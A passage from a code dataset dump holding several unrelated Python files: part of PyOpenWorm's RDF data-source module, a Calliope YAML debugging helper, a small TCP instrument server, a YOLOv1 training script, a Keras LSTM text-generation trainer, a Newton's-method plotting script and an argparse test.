s = \" + s)\n self.conf['rdf.graph'].update(s)\n\n def add_statements(self, graph):\n \"\"\"\n Add a set of statements to the database.\n Annotates the addition with uploader name, etc\n\n :param graph: An iterable of triples\n \"\"\"\n self._add_to_store(graph)\n\n def _reify(self, g, s):\n \"\"\"\n Add a statement object to g that binds to s\n \"\"\"\n n = self.conf['new_graph_uri'](s)\n g.add((n, RDF['type'], RDF['Statement']))\n g.add((n, RDF['subject'], s[0]))\n g.add((n, RDF['predicate'], s[1]))\n g.add((n, RDF['object'], s[2]))\n return n\n\n\nclass Data(Configure):\n\n \"\"\"\n Provides configuration for access to the database.\n\n Usually doesn't need to be accessed directly\n \"\"\"\n\n def __init__(self, conf=None, **kwargs):\n \"\"\"\n Parameters\n ----------\n conf : Configure\n A Configure object\n \"\"\"\n super(Data, self).__init__(**kwargs)\n\n if conf is not None:\n self.copy(conf)\n else:\n self.copy(Configureable.default)\n self.namespace = Namespace(\"http://openworm.org/entities/\")\n self.molecule_namespace = Namespace(\"http://openworm.org/entities/molecules/\")\n self['rdf.namespace'] = self.namespace\n self['molecule_name'] = self._molecule_hash\n self['new_graph_uri'] = self._molecule_hash\n\n @classmethod\n def load(cls, file_name):\n \"\"\" Load a file into a new Data instance storing configuration in a JSON format \"\"\"\n return cls.open(file_name)\n\n @classmethod\n def open(cls, file_name):\n \"\"\" Load a file into a new Data instance storing configuration in a JSON format \"\"\"\n return cls(conf=Configure.open(file_name))\n\n def openDatabase(self):\n self.init_database()\n\n def init_database(self):\n \"\"\" Open the configured database \"\"\"\n self._init_rdf_graph()\n L.debug(\"opening \" + str(self.source))\n self.source.open()\n nm = NamespaceManager(self['rdf.graph'])\n self['rdf.namespace_manager'] = nm\n self['rdf.graph'].namespace_manager = nm\n\n # A runtime version number for the graph should update for all changes\n # to the graph\n self['rdf.graph.change_counter'] = 0\n\n self['rdf.graph']._add = self['rdf.graph'].add\n self['rdf.graph']._remove = self['rdf.graph'].remove\n self['rdf.graph'].add = self._my_graph_add\n self['rdf.graph'].remove = self._my_graph_remove\n nm.bind(\"\", self['rdf.namespace'])\n\n def _my_graph_add(self, triple):\n self['rdf.graph']._add(triple)\n\n # It's important that this happens _after_ the update otherwise anyone\n # checking could think they have the lastest version when they don't\n self['rdf.graph.change_counter'] += 1\n\n def _my_graph_remove(self, triple_or_quad):\n self['rdf.graph']._remove(triple_or_quad)\n\n # It's important that this happens _after_ the update otherwise anyone\n # checking could think they have the lastest version when they don't\n self['rdf.graph.change_counter'] += 1\n\n def closeDatabase(self):\n \"\"\" Close a the configured database \"\"\"\n self.source.close()\n\n def _init_rdf_graph(self):\n # Set these in case they were left out\n self['rdf.source'] = self.get('rdf.source', 'default')\n self['rdf.store'] = self.get('rdf.store', 'default')\n self['rdf.store_conf'] = self.get('rdf.store_conf', 'default')\n\n # XXX:The conf=self can probably be removed\n self.sources = {'sqlite': SQLiteSource,\n 'sparql_endpoint': SPARQLSource,\n 'sleepycat': SleepyCatSource,\n 'default': DefaultSource,\n 'trix': TrixSource,\n 'serialization': SerializationSource,\n 'zodb': ZODBSource}\n source = self.sources[self['rdf.source'].lower()](conf=self)\n self.source = source\n\n 
self.link('semantic_net_new', 'semantic_net', 'rdf.graph')\n self['rdf.graph'] = source\n return source\n\n def _molecule_hash(self, data):\n return URIRef(\n self.molecule_namespace[\n hashlib.sha224(\n str(data)).hexdigest()])\n\n def __setitem__(self, k, v):\n return Configure.__setitem__(self, k, v)\n\n def __getitem__(self, k):\n return Configure.__getitem__(self, k)\n\n\ndef modification_date(filename):\n t = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(t)\n\n\nclass RDFSource(Configureable, ConfigValue):\n\n \"\"\" Base class for data sources.\n\n Alternative sources should dervie from this class\n \"\"\"\n\n def __init__(self, **kwargs):\n super(RDFSource, self).__init__(**kwargs)\n self.graph = False\n\n def get(self):\n if self.graph is False:\n raise Exception(\n \"Must call openDatabase on Data object before using the database\")\n return self.graph\n\n def close(self):\n if self.graph is False:\n return\n self.graph.close()\n self.graph = False\n\n def open(self):\n \"\"\" Called on ``PyOpenWorm.connect()`` to set up and return the rdflib graph.\n Must be overridden by sub-classes.\n \"\"\"\n raise NotImplementedError()\n\n\nclass SerializationSource(RDFSource):\n\n \"\"\" Reads from an RDF serialization or, if the configured database is more\n recent, then from that.\n\n The database store is configured with::\n\n \"rdf.source\" = \"serialization\"\n \"rdf.store\" = \n \"rdf.serialization\" = \n \"rdf.serialization_format\" = \n \"rdf.store_conf\" = \n\n \"\"\"\n\n def open(self):\n if not self.graph:\n self.graph = True\n import glob\n # Check the ages of the files. Read the more recent one.\n g0 = ConjunctiveGraph(store=self.conf['rdf.store'])\n database_store = self.conf['rdf.store_conf']\n source_file = self.conf['rdf.serialization']\n file_format = self.conf['rdf.serialization_format']\n # store_time only works for stores that are on the local\n # machine.\n try:\n store_time = modification_date(database_store)\n # If the store is newer than the serialization\n # get the newest file in the store\n for x in glob.glob(database_store + \"/*\"):\n mod = modification_date(x)\n if store_time < mod:\n store_time = mod\n except Exception:\n store_time = DT.min\n\n trix_time = modification_date(source_file)\n\n g0.open(database_store, create=True)\n\n if store_time > trix_time:\n # just use the store\n pass\n else:\n # delete the database and read in the new one\n # read in the serialized format\n g0.parse(source_file, format=file_format)\n\n self.graph = g0\n\n return self.graph\n\n\nclass TrixSource(SerializationSource):\n\n \"\"\" A SerializationSource specialized for TriX\n\n The database store is configured with::\n\n \"rdf.source\" = \"trix\"\n \"rdf.trix_location\" = \n \"rdf.store\" = \n \"rdf.store_conf\" = \n\n \"\"\"\n\n def __init__(self, **kwargs):\n SerializationSource.__init__(self, **kwargs)\n h = self.conf.get('trix_location', 'UNSET')\n self.conf.link('rdf.serialization', 'trix_location')\n self.conf['rdf.serialization'] = h\n self.conf['rdf.serialization_format'] = 'trix'\n\n\ndef _rdf_literal_to_gp(x):\n return x.n3()\n\n\ndef _triples_to_bgp(trips):\n # XXX: Collisions could result between the variable names of different\n # objects\n g = \" .\\n\".join(\" \".join(_rdf_literal_to_gp(x) for x in y) for y in trips)\n return g\n\n\nclass SPARQLSource(RDFSource):\n\n \"\"\" Reads from and queries against a remote data store\n\n ::\n\n \"rdf.source\" = \"sparql_endpoint\"\n \"\"\"\n\n def open(self):\n # XXX: If we have a source that's read 
only, should we need to set the\n # store separately??\n g0 = ConjunctiveGraph('SPARQLUpdateStore')\n g0.open(tuple(self.conf['rdf.store_conf']))\n self.graph = g0\n return self.graph\n\n\nclass SleepyCatSource(RDFSource):\n\n \"\"\" Reads from and queries against a local Sleepycat database\n\n The database can be configured like::\n\n \"rdf.source\" = \"Sleepycat\"\n \"rdf.store_conf\" = \n \"\"\"\n\n def open(self):\n import logging\n # XXX: If we have a source that's read only, should we need to set the\n # store separately??\n g0 = ConjunctiveGraph('Sleepycat')\n self.conf['rdf.store'] = 'Sleepycat'\n g0.open(self.conf['rdf.store_conf'], create=True)\n self.graph = g0\n logging.debug(\"Opened SleepyCatSource\")\n\n\nclass SQLiteSource(RDFSource):\n\n \"\"\" Reads from and queries against a SQLite database\n\n See see the SQLite database :file:`db/celegans.db` for the format\n\n The database store is configured with::\n\n \"rdf.source\" = \"Sleepycat\"\n \"sqldb\" = \"/home/USER/openworm/PyOpenWorm/db/celegans.db\",\n \"rdf.store\" = \n \"rdf.store_conf\" = \n\n Leaving ``rdf.store`` unconfigured simply gives an in-memory data store.\n \"\"\"\n\n def open(self):\n conn = sqlite3.connect(self.conf['sqldb'])\n cur = conn.cursor()\n\n # first step, grab all entities and add them to the graph\n n = self.conf['rdf.namespace']\n\n cur.execute(\"SELECT DISTINCT ID, Entity FROM tblentity\")\n g0 = ConjunctiveGraph(self.conf['rdf.store'])\n g0.open(self.conf['rdf.store_conf'], create=True)\n\n for r in cur.fetchall():\n # first item is a number -- needs to be converted to a string\n first = str(r[0])\n # second item is text\n second = str(r[1])\n\n # This is the backbone of any RDF graph. The unique\n # ID for each entity is encoded as a URI and every other piece of\n # knowledge about that entity is connected via triples to that URI\n # In this case, we connect the common name of that entity to the\n # root URI via the RDFS label property.\n g0.add((n[first], RDFS.label, Literal(second)))\n\n # second step, get the relationships between them and add them to the\n # graph\n cur.execute(\n \"SELECT DISTINCT EnID1, Relation, EnID2, Citations FROM tblrelationship\")\n\n gi = ''\n\n i = 0\n for r in cur.fetchall():\n # all items are numbers -- need to be converted to a string\n first = str(r[0])\n second = str(r[1])\n third = str(r[2])\n prov = str(r[3])\n\n ui = self.conf['molecule_name'](prov)\n gi = Graph(g0.store, ui)\n\n gi.add((n[first], n[second], n[third]))\n\n g0.add([ui, RDFS.label, Literal(str(i))])\n if (prov != ''):\n g0.add([ui, n[u'text_reference'], Literal(prov)])\n\n i = i + 1\n\n cur.close()\n conn.close()\n self.graph = g0\n\n\nclass DefaultSource(RDFSource):\n\n \"\"\" Reads from and queries against a configured database.\n\n The default configuration.\n\n The database store is configured with::\n\n \"rdf.source\" = \"default\"\n \"rdf.store\" = \n \"rdf.store_conf\" = \n\n Leaving unconfigured simply gives an in-memory data store.\n \"\"\"\n\n def open(self):\n self.graph = ConjunctiveGraph(self.conf['rdf.store'])\n self.graph.open(self.conf['rdf.store_conf'], create=True)\n\n\nclass ZODBSource(RDFSource):\n\n \"\"\" Reads from and queries against a configured Zope Object Database.\n\n If the configured database does not exist, it is created.\n\n The database store is configured with::\n\n \"rdf.source\" = \"ZODB\"\n \"rdf.store_conf\" = \n\n Leaving unconfigured simply gives an in-memory data store.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ZODBSource, 
self).__init__(*args, **kwargs)\n self.conf['rdf.store'] = \"ZODB\"\n\n def open(self):\n import ZODB\n from ZODB.FileStorage import FileStorage\n self.path = self.conf['rdf.store_conf']\n openstr = os.path.abspath(self.path)\n\n fs = FileStorage(openstr)\n self.zdb = ZODB.DB(fs, cache_size=1600)\n self.conn = self.zdb.open()\n root = self.conn.root()\n if 'rdflib' not in root:\n root['rdflib'] = ConjunctiveGraph('ZODB')\n self.graph = root['rdflib']\n try:\n transaction.commit()\n except Exception:\n # catch commit exception and close db.\n # otherwise db would stay open and follow up tests\n # will detect the db in error state\n L.warning('Forced to abort transaction on ZODB store opening')\n traceback.print_exc()\n transaction.abort()\n transaction.begin()\n self.graph.open(self.path)\n\n def close(self):\n if self.graph is False:\n return\n\n self.graph.close()\n\n try:\n transaction.commit()\n except Exception:\n # catch commit exception and close db.\n # otherwise db would stay open and follow up tests\n # will detect the db in error state\n traceback.print_exc()\n L.warning('Forced to abort transaction on ZODB store closing')\n transaction.abort()\n self.conn.close()\n self.zdb.close()\n self.graph = False\n","sub_path":"PyOpenWorm/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":19609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"631712949","text":"\"\"\"\nCopyright (C) 2013-2018 Calliope contributors listed in AUTHORS.\nLicensed under the Apache 2.0 License (see LICENSE file).\n\ndebug.py\n~~~~~~~~\n\nDebugging tools.\n\n\"\"\"\n\nfrom functools import reduce\nimport operator\n\nimport ruamel.yaml as ruamel_yaml\n\n\ndef get_from_dict(data_dict, map_list):\n return reduce(operator.getitem, map_list, data_dict)\n\n\ndef apply_to_dict(data_dict, map_list, func, args):\n getattr(get_from_dict(data_dict, map_list[:-1])[map_list[-1]], func)(*args)\n\n\ndef save_debug_data(model_run, debug_data, out_file):\n # README: currently based on ruamel.yaml 0.15 which is a mix of old\n # and new API - possibly needs a bit of rewriting once ruamel.yaml\n # has progressed a bit further\n yaml = ruamel_yaml.YAML()\n\n model_run_debug = model_run.copy()\n del model_run_debug['timeseries_data'] # Can't be serialised!\n\n # Turn sets in model_run into lists for YAML serialization\n for k, v in model_run_debug.sets.items():\n model_run_debug.sets[k] = list(v)\n\n debug_comments = debug_data['comments']\n debug_yaml = yaml.load(yaml.dump(model_run_debug.as_dict()))\n for k in debug_comments.model_run.keys_nested():\n v = debug_comments.model_run.get_key(k)\n keys = k.split('.')\n apply_to_dict(debug_yaml, keys[:-1], 'yaml_add_eol_comment', (v, keys[-1]))\n\n dumper = ruamel_yaml.dumper.RoundTripDumper\n dumper.ignore_aliases = lambda self, data: True\n\n with open(out_file, 'w') as f:\n ruamel_yaml.dump(\n debug_yaml, f,\n Dumper=dumper, default_flow_style=False\n )\n","sub_path":"calliope/core/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"364358316","text":"import threading, SocketServer, pickle, time, numpy\nimport socket\n\nclass TCPHandler(SocketServer.BaseRequestHandler):\n def handle(self):\n # self.request is the TCP socket connected to the client\n self.data = self.request.recv(1024).strip()\n # Check is present in dictionary\n if self.data == \"log\":\n self.request.send(self.server.log)\n return\n if self.data == \"monitor\":\n self.request.send(pickle.dumps(self.server.values))\n \n try:\n self.response = self.server.commands[self.data]()\n self.request.send(self.response)\n except:\n self.request.send(self.server.log)\n\ndef server(host = \"\", port = 9999, commands= {'log': 0}):\n #HOST, PORT = \"192.168.5.24\", 9999\n # Create the server, binding to localhost on port 9999\n server = SocketServer.TCPServer((host, port), TCPHandler)\n server_thread = threading.Thread(target=server.serve_forever)\n server_thread.start()\n \n server.log = \"\"\n server.values = []\n \n return server\n\ndef connect(command, host, port = 9999):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n s.send(command)\n data = s.recv(2**15)\n \n return data\n s.close()\n \n \nif __name__ == '__main__':\n s = server()\n i = 0\n while True:\n i = i +1\n time.sleep(0.3)\n s.values = [numpy.linspace(i,i+2,3),numpy.linspace(i-5,i+2-5,3),]\n ","sub_path":"control/inst_server.py","file_name":"inst_server.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"142809225","text":"# import library\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.transforms as transforms\nimport torch.optim as optim\nimport torchvision\nimport glob\nimport os\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport datetime\n\n# import self-made function\nfrom dataset import hw2DataSet\nfrom models import Yolov1_vgg16bn\nfrom yoloLoss import yoloLoss\n\n#############################\n#1. Creating a custom dataset\n#############################\n#[2]\n# load the trainset and testset\ntrainset = hw2DataSet(root='../hw2_train_val/train15000/',\n transform=transforms.ToTensor())\ntestset = hw2DataSet(root='../hw2_train_val/val1500/',\n transform=transforms.ToTensor())\nprint('# images in trainset:', len(trainset))\nprint('# images in testset:', len(testset))\n\n\n#[3]\n# Use the torch dataloader to iterate through the dataset\ntrainset_loader = DataLoader(trainset, batch_size=16, shuffle=True, num_workers=4)\ntestset_loader = DataLoader(testset, batch_size=16, shuffle=False, num_workers=4)\n# get some random training images\ndataiter = iter(trainset_loader)\nimages, labels = dataiter.next()\nprint('Image tensor in each batch:', images.shape, images.dtype)\nprint('Label tensor in each batch:', labels.shape, labels.dtype)\n\n\n#[4]\n# We can visualize what contains in each batch:\n# functions to show an image\ndef imshow(img):\n npimg = img.numpy() # transfer torch to numpy\n plt.imshow(np.transpose(npimg, (1, 2, 0))) #if using numpy image tranfered from torch\n# functions to show an image's label in 7x7x26\ndef labelshow(img_number):\n for patchi in range(7):\n for patchj in range(7):\n print (patchi,patchj,labels[img_number][patchi][patchj])\n\n# show images and label\n'''imshow(torchvision.utils.make_grid(images))\nlabelshow(0)\nplt.show()'''\n\n\n###########################################\n#2. Creating a Convolutional Neural Network\n###########################################\n#[5]\n# Use GPU if available, otherwise stick with cpu\nuse_cuda = torch.cuda.is_available()\ntorch.manual_seed(123)\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\nprint('Device used:', device)\n\n\n#[6]\n# import model from model.py\nmodel = Yolov1_vgg16bn(pretrained=True).to(device) # Remember to move the model to \"device\"\nprint(model)\nlogfile = open('log.txt', 'w')\n\ndef load_checkpoint(checkpoint_path, model,optimizer):\n state = torch.load(checkpoint_path) # for cuda\n #state = torch.load(checkpoint_path, map_location=device) #for cpu\n model.load_state_dict(state['state_dict'])\n optimizer.load_state_dict(state['optimizer'])\n print('model loaded from %s' % checkpoint_path)\n\n#####################\n#3. 
Train the network\n#####################\n#[7]\n# define the training loop\ndef train(model, epoch, log_interval=10):\n learning_rate = 0.002\n optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, momentum=0.9, weight_decay=5e-4)\n criterion = yoloLoss(5,0.05)\n #criterion = nn.MSELoss()\n load_checkpoint(\"map0799/best.pth\",model,optimizer)\n best_test_loss = np.inf\n iteration = 0 # one iteration would go through a ep\n for ep in range(epoch):\n model.train() # Important: set training mode\n if ep == 0:\n learning_rate = 0.001\n for param_group in optimizer.param_groups:\n param_group['lr'] = learning_rate\n if ep == 20:\n learning_rate = 0.0005\n for param_group in optimizer.param_groups:\n param_group['lr'] = learning_rate\n #total_loss = 0.\n for batch_idx,(images,target) in enumerate(trainset_loader):\n images, target = images.to(device), target.to(device)\n optimizer.zero_grad() #to zero\n pred = model(images)\n loss = criterion(pred,target)\n #total_loss += loss.images[0]\n loss.backward() #backpro\n optimizer.step() #update\n #optimizer.zero_grad() #to zero\n if iteration % log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n ep, batch_idx * len(images), len(trainset_loader.dataset),\n 100. * batch_idx / len(trainset_loader), loss.item()))\n iteration += 1\n\n # Evaluate at the end of each epoch\n best_test_loss = validation(model,optimizer,best_test_loss,ep)\n\n\n#[8]\n# evaluate at the end of each epoch.\ndef validation(model,optimizer,best_test_loss,ep):\n model.eval()\n criterion = yoloLoss(5,0.05)\n #criterion = nn.MSELoss()\n validation_loss = 0.0\n with torch.no_grad(): # This will free the GPU memory used for back-prop\n for batch_idx,(images,target) in enumerate(testset_loader):\n images, target = images.to(device), target.to(device)\n pred = model(images)\n loss = criterion(pred,target)\n validation_loss += loss.item()\n validation_loss /= len(testset_loader)\n print (\"validation avg loss:\" + str(validation_loss) + '\\n')\n\n # save best loss as best.pth\n if best_test_loss > validation_loss:\n best_test_loss = validation_loss\n print('get best test loss %.5f' % best_test_loss)\n save_checkpoint('best.pth',model,optimizer)\n if ep%10==0:\n save_checkpoint('best_'+str(ep)+'.pth',model,optimizer)\n\n # write to logfile\n logfile.writelines(\"ep: \"+str(ep)+\" validation avg loss:\" + str(validation_loss) + \"\\n\")\n logfile.flush()\n\n return best_test_loss\n\ndef save_checkpoint(checkpoint_path, model, optimizer):\n state = {'state_dict': model.state_dict(),\n 'optimizer' : optimizer.state_dict()}\n torch.save(state, checkpoint_path)\n print('model saved to %s' % checkpoint_path)\n\n#[9]\n# It's time to train the model!\nepochs_num = 50\nnow = datetime.datetime.now()\nlogfile.writelines(\"start training at:\"+str(now)+\"\\n\")\nlogfile.flush()\ntrain(model, epochs_num)\nnow = datetime.datetime.now()\nlogfile.writelines(\"end training at:\"+str(now)+\"\\n\")\nlogfile.flush()\n","sub_path":"hw2_YOLOv1_object_detection/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"474431890","text":"import os\nimport time\nimport numpy as np\nimport csv\nimport pickle\nimport json\nimport keras.backend as K\n\nfrom keras.models import Model\nfrom keras.layers import Dense, Activation, Input, LSTM, Embedding, Dropout, TimeDistributed\nfrom keras.optimizers import RMSprop\nfrom keras.callbacks import LambdaCallback, CSVLogger, History, ModelCheckpoint\n\nfrom clean_data import tokenize_dir, clean_tokens\nfrom embed_words import train_word_model, dictionary_lookups, vectorize_words\n\n# working directory\npath = os.getcwd()\n\n# define data file and file extension\n# replace with location of data-set\ndata_path = ''\nextension = 'csv'\n\n# for saving\nversion_name = 'primary_train'\n\n# START\n# ----\n\n# LOAD DATA\n# --\n\nprint('\\nLoading data...')\n\nprint('Start-Time: ', time.ctime(time.time()))\ncorpus = tokenize_dir(data_path, extension)\nprint('End-Time: ', time.ctime(time.time()))\n\n# clean tokenize corpus\nsentences, max_sentence, max_sentence_len = clean_tokens(corpus)\n\nprint(\"max: %d \" % max_sentence_len)\n\nprint('Num sentences in original corpus:', len(corpus))\nprint('Num sentences for model:', len(sentences))\n\n# print('\\nTRAINING CORPUS: \\n' + corpus)\n\n\n# GENERATE EMBEDDINGS\n# ---------------\n\nprint('\\nCreating word embeddings...')\n# train and save the embedding model\nword_model = train_word_model(corpus, 'word_model')\n\n# get the initial model weight\nembed_weights = word_model.wv.syn0\n# get the vocab size and embedding shape for model\nvocab_size, embedding_size = embed_weights.shape\n\n# get the dictionary lookup functions\nword_to_index, index_to_word = dictionary_lookups(word_model)\n\n# VECTORIZE WORDS\n# ----------------\n\nprint('\\nVectorizing words...')\n# define the shape of input & output matrices\n# input shape (no sentences, max-sentence-size)\ntrain_input = np.zeros([len(sentences), max_sentence_len], dtype=np.int32)\n\n# output shape (no sentences, max-sentence-size, 1)\ntrain_output = np.zeros([len(sentences), max_sentence_len, 1], dtype=np.int32)\n\n# populate model vectors with word embedding data\ntrain_input, train_output = vectorize_words(sentences, train_input, train_output, word_to_index)\n\nprint('\\ntrain_input shape:', train_input.shape)\nprint('train_output shape:', train_output.shape)\n\n# MODEL SETUP\n# ------------------\nprint('\\nConstructing Model...')\n\n# define the model layers\nmodel_input = Input(shape=(None,))\nmodel_embed = Embedding(input_dim=vocab_size, output_dim=embedding_size, weights=[embed_weights])\nmodel_lstm_1 = LSTM(units=embedding_size, return_sequences=True, return_state=False)\nmodel_dropout_1 = Dropout(0.2)\nmodel_lstm_2 = LSTM(units=embedding_size, return_sequences=True, return_state=False)\nmodel_dropout_2 = Dropout(0.2)\nmodel_dense = TimeDistributed(Dense(units=vocab_size))\nmodel_activation = Activation('softmax')\n# Connect layers\nembedded = model_embed(model_input)\nlstm_1_output = model_lstm_1(embedded)\ndropout_1_output = model_dropout_1(lstm_1_output)\nlstm_2_output = model_lstm_2(dropout_1_output)\ndropout_2_output = model_dropout_2(lstm_2_output)\ndense_output = model_dense(dropout_2_output)\nmodel_output = model_activation(dense_output)\n\n\n# Define the model\nprimary_model = Model(model_input, model_output)\n\n# Define optimizer\nrms_prop = RMSprop(lr=0.001, rho=0.9, epsilon=None, decay=0.0)\n\n\n# Define custom evaluation metrics\ndef perplexity(y_true, y_pred):\n cross_entropy = K.sparse_categorical_crossentropy(y_true, y_pred)\n perplexity = 
K.pow(2.0, cross_entropy)\n # perplexity = 2 ** cross_entropy\n return perplexity\n\n\ndef crossentropy(y_true, y_pred):\n return K.sparse_categorical_crossentropy(y_true, y_pred)\n\n\n# Compile model\nprimary_model.compile(\n optimizer=rms_prop,\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy', crossentropy, perplexity])\n\n# print summary of model layers\nprint(primary_model.summary())\n\n# TRAINING SETUP\n# --------------\nprint(\"\\nVocab size: %d\" % vocab_size)\nprint(\"Embedding size: %d\" % embedding_size)\n\nbatch_size = 32\nepochs = 25\nvalidation_split = 0.2\nprint(\"\\nTraining in batches of: %d\" % batch_size)\nprint(\"Training epochs: %d\" % epochs)\n\n# start point for generated text\nstart_words = ['the', 'there', 'from', 'have', 'can',\n 'engine', 'body', 'speed', 'elegance', 'safety',\n 'fun', 'love', 'excite', 'joy', 'curious', ]\n\n\n# apply temperature to each model sample\ndef temp_sample(predictions, temperature=1.0):\n # value 0 return argmax sampling\n if temperature <= 0:\n return np.argmax(predictions)\n predictions = np.asarray(predictions).astype('float64')\n predictions = np.log(predictions) / temperature\n exp_predictions = np.exp(predictions)\n predictions = exp_predictions / np.sum(exp_predictions)\n probability = np.random.multinomial(1, predictions, 1)\n return np.argmax(probability)\n\n\n# generate sentence one word at a time - limiting to 10 words\ndef generate_next_word(text, temp, sentence_length=10):\n word_indices = [word_to_index(word) for word in text.lower().split()]\n for n in range(sentence_length):\n prediction = primary_model.predict(x=np.array(word_indices))\n index = temp_sample(prediction[0, -1, :], temperature=temp)\n word_indices.append(index)\n return ' '.join(index_to_word(index) for index in word_indices)\n\n\n# writes prediction to file for each epoch\ndef on_epoch_end(epoch, _):\n # declare csv objects for both sampling styles\n wr = csv.writer(f, dialect='excel', lineterminator='\\n')\n for text in start_words:\n sentence = generate_next_word(text, 0)\n wr.writerow(sentence)\n\n\n# TRAIN MODEL\n# -----------\nprint('\\nTraining Start-Time: ', time.ctime(time.time()))\n\n# calls function on every epoch end\ngenerate_callback = LambdaCallback(on_epoch_end=on_epoch_end)\n\n# writes training stats to file\ncsv_logger = CSVLogger(path + '/Logs/' + version_name + '.log')\n\nhistory = History()\n\nmodel_check = ModelCheckpoint(path + '/Models/' + version_name + '_.{epoch:02d}.hdf5',\n monitor='val_perplexity',\n verbose=1,\n save_best_only=False,\n save_weights_only=False,\n mode='auto',\n period=1)\n\nwith open(path + '/Output/' + version_name + '.csv', 'w') as f:\n hist = primary_model.fit(train_input,\n train_output,\n batch_size=batch_size,\n verbose=1,\n shuffle='batch',\n epochs=epochs,\n validation_split=validation_split,\n callbacks=[generate_callback, csv_logger, history])\n\nprint('\\nTraining Finish Time: ', time.ctime(time.time()))\n\n# SAVE MODEL\n# -----------\n\nwith open(path + '/Logs/' + version_name + '_train_history.pkl', 'wb') as file:\n pickle.dump(hist.history, file)\n\nprint(\"\\nSaving trained model...\")\nprimary_model.save(path + '/Models/' + version_name + '.h5')\n\nprint(\"\\nSaving model weights...\")\nprimary_model.save_weights(path + '/Models/' + version_name + '_weights.h5')\n\nprint(\"\\nSaving model to JSON...\")\nmodel_json_string = primary_model.to_json()\nwith open(path + '/Models/' + version_name + '.json', \"w\") as f_j:\n json.dump(json.loads(model_json_string), f_j, 
indent=4)\n\nprint(\"\\nAll done!\")\n","sub_path":"primary.py","file_name":"primary.py","file_ext":"py","file_size_in_byte":7339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"337831775","text":"from matplotlib import pyplot as plt\nimport numpy as np\nfrom tools import FirstDerivative, SecondDerivative, GetA, GetInverseMatrix\nfrom functions import fun2, fun1, fun3, fun4, fun5, fun6, fun7, fun8\n\ndef fun(x1, x2):\n return x1**2 + 25*x2**2\n\ndef display(x_range, y_range, function, a=1, X0=None, delta=0.01):\n if X0 is None:\n X0 = [5, 5]\n\n fig = plt.figure(figsize=(7, 7)) # 定义新的三维坐标轴\n ax3 = plt.axes(projection='3d')\n\n # 定义三维数据\n xx = np.arange(x_range[0], x_range[1], 0.5)\n yy = np.arange(y_range[0], y_range[1], 0.5)\n X, Y = np.meshgrid(xx, yy)\n Z = function(X, Y)\n\n ax3.contour(X, Y, Z, 20, zdim='z', offset=-2, cmap='rainbow') # 等高线图,要设置offset,为Z的最小值\n ax3.plot_wireframe(X, Y, Z, color='gray')\n\n X = np.array([[X0[0]], [X0[1]]])\n X_new = np.array([[float('inf')], [float('inf')]])\n\n count = 0\n grad_list = []\n fx = []\n\n while abs((X[0, 0] - X_new[0, 0]) ** 2 + (X[1, 0] - X_new[1, 0]) ** 2) > delta:\n if count != 0: # count=0的时候new还没有更新,不能将其值赋给X\n X = X_new\n\n fx.append(function(X[0, 0], X[1, 0]))\n grad = np.array(FirstDerivative(X[0, 0], X[1, 0], function)).reshape(2, 1) # 计算梯度\n grad_list.append(grad)\n\n # !!!!!!!!!!!!!如果此时梯度为零,说明此时点为驻点!!!!!!!!!!!!!!!\n if abs(grad[0, 0]) < 0.001 and abs(grad[1, 0]) < 0.001:\n # 如果给一个微小的扰动大于此时的值,那么认为此时为极小值点\n if function(X[0, 0] + delta, X[1, 0] + delta) > function(X[0, 0], X[1, 0]):\n print(\"最优点\")\n ax3.scatter3D(X[0, 0], X[1, 0], function(X[0, 0], X[1, 0]), c='y', label='最优点', s=50)\n break\n\n ax3.scatter3D(X[0, 0], X[1, 0], function(X[0, 0], X[1, 0]), c='g', s=50)\n\n second_derivative = SecondDerivative(X[0, 0], X[1, 0], function) # 求二阶导\n inverse_matrix = GetInverseMatrix(second_derivative) # 求二阶导矩阵的逆\n\n X_new = np.array(X) - a * np.matmul(inverse_matrix, grad) # a是下降的步长\n\n count += 1\n\n plt.pause(0.4)\n\n ax3.scatter3D(X_new[0, 0], X_new[1, 0], function(X_new[0, 0], X_new[1, 0]), c='r', label='最优点', s=50)\n\n if X_new[0] == float('inf') and X_new[1] == float('inf'):\n X_new = X\n\n if count == 0:\n count += 1\n print(\"一共迭代了{:}次\\n极小值点为({:.2f},{:.2f})\\n极小值为{:.2f}\"\n .format(count, float(X_new[0, 0]), float(X_new[1, 0]), float(function(X_new[0, 0], X_new[1, 0]))))\n print(grad_list)\n print(\"fx = \", fx)\n\n ax3.set_xlabel('x')\n ax3.set_ylabel('y')\n ax3.set_zlabel('z')\n ax3.set_title('3D contour')\n plt.show()\n\n\nif __name__ == \"__main__\":\n display((-5, 10), (-5, 7), fun, X0=[2, 2])\n","sub_path":"无约束优化方法/牛顿型方法.py","file_name":"牛顿型方法.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"210721300","text":"import argparse\nparser = argparse.ArgumentParser(description = 'Square a number')\nparser.add_argument(\"square\", help=\"display a square of a given number\",\n type=int)\ndef main():\n args = parser.parse_args()\n return args.square**2\n\nif __name__ == \"__main__\":\n main()","sub_path":"tests/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
